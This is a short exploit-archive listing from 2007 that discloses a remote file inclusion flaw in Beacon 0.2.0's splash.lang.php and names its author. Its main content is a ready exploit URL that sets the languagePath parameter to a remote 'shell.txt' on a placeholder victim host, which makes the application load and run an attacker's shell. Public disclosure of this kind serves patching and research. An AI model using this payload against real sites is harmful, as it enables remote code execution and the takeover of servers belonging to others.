Beacon 0.2.0 (splash.lang.php) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Beacon 0.2.0 (splash.lang.php) Remote File Inclusion Vulnerability
# Published : 2007-05-12
# Author : ThE TiGeR
# Previous Title : YAAP <= 1.5 __autoload() Remote File Inclusion Vulnerability
# Next Title : Snaps! Gallery 1.4.4 Remote User Pass Change Exploit

#Beacon => 2.0Remot file inclusion (languagePath)                                           

#Download script : http://download.savannah.gnu.org/releases/beacon/beacon_0_2_0.zip            

#Thanks Str0ke

#Exploit:

#http://victime.com/pbeacon_path]/beacon/language/1/splash.lang.php?languagePath=shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail[dot]com

# www.Syue.com [2007-05-12]